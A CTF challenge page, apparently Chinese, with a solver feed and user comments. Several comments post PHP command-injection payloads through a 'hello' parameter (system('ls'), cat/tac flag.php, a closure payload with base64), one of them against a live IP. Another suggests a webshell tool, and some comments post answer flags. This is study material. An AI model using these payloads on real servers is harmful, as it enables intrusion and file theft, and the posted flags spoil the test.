评分(9)
解题动态
lishenyuchen 攻破了该题 1小时前
摇曳露营芝麻凛 攻破了该题 2小时前
1745085539 攻破了该题 8小时前
3287973822 攻破了该题 1天前
hulihaha 攻破了该题 1天前
hyukoh 攻破了该题 1天前
Gargantua 攻破了该题 1天前
Sudamasaki 攻破了该题 1天前
1031368023 攻破了该题 1天前
lindaxu 攻破了该题 1天前
开心的小熊 攻破了该题 1天前
18034980366 攻破了该题 1天前
HASD 攻破了该题 1天前
liuliuliu666 攻破了该题 1天前
菜薯为什么 攻破了该题 2天前
zypts 攻破了该题 2天前
pspp 攻破了该题 2天前
jiayouya 攻破了该题 2天前
jiario002 攻破了该题 2天前
评论
liuguowang75 3天前
举报
/?hello=system('ls') /?hello=system('cat flag.php')
HK1ng 5天前
举报
这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。
Gargantua 1天前
举报
这是什么原因呢?是不是因为浏览器将php代码执行了啊
zhwen 6天前
举报
代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'
650907784qqcom 17天前
举报
flag{***}
xinchang 25天前
举报
flag{*********}
八一卜kod 1月前
举报
Too Young Too Simple
evira 2月前
举报
温馨提示(但不是正解):这个题可以尝试一下用菜刀去shell
BaiBaiWin 4月前
举报
http://114.67.175.224:16319/?hello=system('tac flag.php')
1215125613 4月前
举报
flag{1e6d67d7cec2d7d4c373db2605f5f4a1}
Wang_Micro 4月前
举报
flag{771f65b0a99e6ebb383759a6d4e34c8a}